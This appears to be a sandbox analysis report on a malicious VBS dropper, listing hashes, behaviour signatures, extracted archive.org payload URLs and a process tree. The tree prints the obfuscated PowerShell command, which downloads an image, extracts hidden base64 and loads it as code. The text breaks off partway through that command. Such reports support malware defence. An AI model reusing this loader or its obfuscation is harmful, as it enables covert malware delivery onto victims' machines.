Overview

overview

10

Static

static

1

sheisfinew...ke.vbs

windows7-x64

10

sheisfinew...ke.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    23/08/2024, 10:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sheisfinewithcookiesandbuttercake.vbs

  • Size

    178KB

  • MD5

    2adac0d0963b532dc0c58093f73cef27

  • SHA1

    da7363faa9d05f188e4ca7c819b93590a603153d

  • SHA256

    65c53c89ba0942835af6bd03ce3e69ad8ac0c456823fa855b53286c8e09b377c

  • SHA512

    0c49d271882b955026c8929a9056e409efa365f0efeff86c0600afcfe1e77a418978665c4a9aacc4dce3a6da998e5aa162a61f910adfe8d1beafd8d84018a3eb

  • SSDEEP

    3072:i3pEkfydoIXnxGvgt5pkGwAeS7a4ezcwmga+ygnbD:4GkKdoIXc4egwvaNgnbD

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sheisfinewithcookiesandbuttercake.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⦢ ⚈ ⇖ ⮫ ⨻Bp⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻VQBy⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻9⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻JwBo⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bw⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻Og⦢ ⚈ ⇖ ⮫ ⨻v⦢ ⚈ ⇖ ⮫ ⨻C8⦢ ⚈ ⇖ ⮫ ⨻aQBh⦢ ⚈ ⇖ ⮫ ⨻Dg⦢ ⚈ ⇖ ⮫ ⨻M⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻z⦢ ⚈ ⇖ ⮫ ⨻DE⦢ ⚈ ⇖ ⮫ ⨻M⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻C4⦢ ⚈ ⇖ ⮫ ⨻dQBz⦢ ⚈ ⇖ ⮫ ⨻C4⦢ ⚈ ⇖ ⮫ ⨻YQBy⦢ ⚈ ⇖ ⮫ ⨻GM⦢ ⚈ ⇖ ⮫ ⨻a⦢ ⚈ ⇖ ⮫ ⨻Bp⦢ ⚈ ⇖ ⮫ ⨻HY⦢ ⚈ ⇖ ⮫ ⨻ZQ⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻G8⦢ ⚈ ⇖ ⮫ ⨻cgBn⦢ ⚈ ⇖ ⮫ ⨻C8⦢ ⚈ ⇖ ⮫ ⨻Mg⦢ ⚈ ⇖ ⮫ ⨻3⦢ ⚈ ⇖ ⮫ ⨻C8⦢ ⚈ ⇖ ⮫ ⨻aQB0⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bQBz⦢ ⚈ ⇖ ⮫ ⨻C8⦢ ⚈ ⇖ ⮫ ⨻dgBi⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻Xw⦢ ⚈ ⇖ ⮫ ⨻y⦢ ⚈ ⇖ ⮫ ⨻D⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻Mg⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻D⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻Nw⦢ ⚈ ⇖ ⮫ ⨻y⦢ ⚈ ⇖ ⮫ ⨻DY⦢ ⚈ ⇖ ⮫ ⨻Xw⦢ ⚈ ⇖ ⮫ ⨻y⦢ ⚈ ⇖ ⮫ ⨻D⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻Mg⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻D⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻Nw⦢ ⚈ ⇖ ⮫ ⨻y⦢ ⚈ ⇖ ⮫ ⨻DY⦢ ⚈ ⇖ ⮫ ⨻LwB2⦢ ⚈ ⇖ ⮫ ⨻GI⦢ ⚈ ⇖ ⮫ ⨻cw⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻Go⦢ ⚈ ⇖ ⮫ ⨻c⦢ ⚈ ⇖ ⮫ ⨻Bn⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻Ow⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻Hc⦢ ⚈ ⇖ ⮫ ⨻ZQBi⦢ ⚈ ⇖ ⮫ ⨻EM⦢ ⚈ ⇖ ⮫ ⨻b⦢ ⚈ ⇖ ⮫ ⨻Bp⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bgB0⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻PQ⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻E4⦢ ⚈ ⇖ ⮫ ⨻ZQB3⦢ ⚈ ⇖ ⮫ ⨻C0⦢ ⚈ ⇖ ⮫ ⨻TwBi⦢ ⚈ ⇖ ⮫ ⨻Go⦢ ⚈ ⇖ ⮫ ⨻ZQBj⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻BT⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻cwB0⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bQ⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻E4⦢ ⚈ ⇖ ⮫ ⨻ZQB0⦢ ⚈ ⇖ ⮫ ⨻C4⦢ ⚈ ⇖ ⮫ ⨻VwBl⦢ ⚈ ⇖ ⮫ ⨻GI⦢ ⚈ ⇖ ⮫ ⨻QwBs⦢ ⚈ ⇖ ⮫ ⨻Gk⦢ ⚈ ⇖ ⮫ ⨻ZQBu⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻Ow⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻Gk⦢ ⚈ ⇖ ⮫ ⨻bQBh⦢ ⚈ ⇖ ⮫ ⨻Gc⦢ ⚈ ⇖ ⮫ ⨻ZQBC⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻9⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻B3⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻YgBD⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻aQBl⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻EQ⦢ ⚈ ⇖ ⮫ ⨻bwB3⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻b⦢ ⚈ ⇖ ⮫ ⨻Bv⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻BE⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻Cg⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻Bp⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻VQBy⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻KQ⦢ ⚈ ⇖ ⮫ ⨻7⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻aQBt⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻ZwBl⦢ ⚈ ⇖ ⮫ ⨻FQ⦢ ⚈ ⇖ ⮫ ⨻ZQB4⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻9⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻WwBT⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻cwB0⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bQ⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻FQ⦢ ⚈ ⇖ ⮫ ⨻ZQB4⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻LgBF⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻YwBv⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻aQBu⦢ ⚈ ⇖ ⮫ ⨻Gc⦢ ⚈ ⇖ ⮫ ⨻XQ⦢ ⚈ ⇖ ⮫ ⨻6⦢ ⚈ ⇖ ⮫ ⨻Do⦢ ⚈ ⇖ ⮫ ⨻VQBU⦢ ⚈ ⇖ ⮫ ⨻EY⦢ ⚈ ⇖ ⮫ ⨻O⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻Ec⦢ ⚈ ⇖ ⮫ ⨻ZQB0⦢ ⚈ ⇖ ⮫ ⨻FM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻By⦢ ⚈ ⇖ ⮫ ⨻Gk⦢ ⚈ ⇖ ⮫ ⨻bgBn⦢ ⚈ ⇖ ⮫ ⨻Cg⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻Bp⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻QgB5⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻ZQBz⦢ ⚈ ⇖ ⮫ ⨻Ck⦢ ⚈ ⇖ ⮫ ⨻Ow⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BG⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻PQ⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻P⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻8⦢ ⚈ ⇖ ⮫ ⨻EI⦢ ⚈ ⇖ ⮫ ⨻QQBT⦢ ⚈ ⇖ ⮫ ⨻EU⦢ ⚈ ⇖ ⮫ ⨻Ng⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻F8⦢ ⚈ ⇖ ⮫ ⨻UwBU⦢ ⚈ ⇖ ⮫ ⨻EE⦢ ⚈ ⇖ ⮫ ⨻UgBU⦢ ⚈ ⇖ ⮫ ⨻D4⦢ ⚈ ⇖ ⮫ ⨻Pg⦢ ⚈ ⇖ ⮫ ⨻n⦢ ⚈ ⇖ ⮫ ⨻Ds⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻BG⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻PQ⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻P⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻8⦢ ⚈ ⇖ ⮫ ⨻EI⦢ ⚈ ⇖ ⮫ ⨻QQBT⦢ ⚈ ⇖ ⮫ ⨻EU⦢ ⚈ ⇖ ⮫ ⨻Ng⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻F8⦢ ⚈ ⇖ ⮫ ⨻RQBO⦢ ⚈ ⇖ ⮫ ⨻EQ⦢ ⚈ ⇖ ⮫ ⨻Pg⦢ ⚈ ⇖ ⮫ ⨻+⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻Ow⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BJ⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻Hg⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻9⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻Bp⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻V⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻Hg⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻Ek⦢ ⚈ ⇖ ⮫ ⨻bgBk⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻e⦢ ⚈ ⇖ ⮫ ⨻BP⦢ ⚈ ⇖ ⮫ ⨻GY⦢ ⚈ ⇖ ⮫ ⨻K⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BG⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻Ck⦢ ⚈ ⇖ ⮫ ⨻Ow⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bgBk⦢ ⚈ ⇖ ⮫ ⨻Ek⦢ ⚈ ⇖ ⮫ ⨻bgBk⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻e⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻D0⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻Gk⦢ ⚈ ⇖ ⮫ ⨻bQBh⦢ ⚈ ⇖ ⮫ ⨻Gc⦢ ⚈ ⇖ ⮫ ⨻ZQBU⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻e⦢ ⚈ ⇖ ⮫ ⨻B0⦢ ⚈ ⇖ ⮫ ⨻C4⦢ ⚈ ⇖ ⮫ ⨻SQBu⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻ZQB4⦢ ⚈ ⇖ ⮫ ⨻E8⦢ ⚈ ⇖ ⮫ ⨻Zg⦢ ⚈ ⇖ ⮫ ⨻o⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻ZQBu⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻RgBs⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻Zw⦢ ⚈ ⇖ ⮫ ⨻p⦢ ⚈ ⇖ ⮫ ⨻Ds⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻Bz⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻YQBy⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻SQBu⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻ZQB4⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻LQBn⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻w⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻LQBh⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻ZQBu⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻SQBu⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻ZQB4⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻LQBn⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BJ⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻Hg⦢ ⚈ ⇖ ⮫ ⨻Ow⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BJ⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻Hg⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻r⦢ ⚈ ⇖ ⮫ ⨻D0⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BG⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻YQBn⦢ ⚈ ⇖ ⮫ ⨻C4⦢ ⚈ ⇖ ⮫ ⨻T⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻ZwB0⦢ ⚈ ⇖ ⮫ ⨻Gg⦢ ⚈ ⇖ ⮫ ⨻Ow⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻GI⦢ ⚈ ⇖ ⮫ ⨻YQBz⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻Ng⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻Ew⦢ ⚈ ⇖ ⮫ ⨻ZQBu⦢ ⚈ ⇖ ⮫ ⨻Gc⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bo⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻PQ⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻ZQBu⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻SQBu⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻ZQB4⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻LQ⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻cwB0⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻cgB0⦢ ⚈ ⇖ ⮫ ⨻Ek⦢ ⚈ ⇖ ⮫ ⨻bgBk⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻e⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻7⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻YgBh⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻ZQ⦢ ⚈ ⇖ ⮫ ⨻2⦢ ⚈ ⇖ ⮫ ⨻DQ⦢ ⚈ ⇖ ⮫ ⨻QwBv⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻bQBh⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻D0⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻Gk⦢ ⚈ ⇖ ⮫ ⨻bQBh⦢ ⚈ ⇖ ⮫ ⨻Gc⦢ ⚈ ⇖ ⮫ ⨻ZQBU⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻e⦢ ⚈ ⇖ ⮫ ⨻B0⦢ ⚈ ⇖ ⮫ ⨻C4⦢ ⚈ ⇖ ⮫ ⨻UwB1⦢ ⚈ ⇖ ⮫ ⨻GI⦢ ⚈ ⇖ ⮫ ⨻cwB0⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻aQBu⦢ ⚈ ⇖ ⮫ ⨻Gc⦢ ⚈ ⇖ ⮫ ⨻K⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bh⦢ ⚈ ⇖ ⮫ ⨻HI⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BJ⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻Hg⦢ ⚈ ⇖ ⮫ ⨻L⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻YgBh⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻ZQ⦢ ⚈ ⇖ ⮫ ⨻2⦢ ⚈ ⇖ ⮫ ⨻DQ⦢ ⚈ ⇖ ⮫ ⨻T⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻ZwB0⦢ ⚈ ⇖ ⮫ ⨻Gg⦢ ⚈ ⇖ ⮫ ⨻KQ⦢ ⚈ ⇖ ⮫ ⨻7⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻YwBv⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻bQBh⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻BC⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻9⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻WwBT⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻cwB0⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bQ⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻EM⦢ ⚈ ⇖ ⮫ ⨻bwBu⦢ ⚈ ⇖ ⮫ 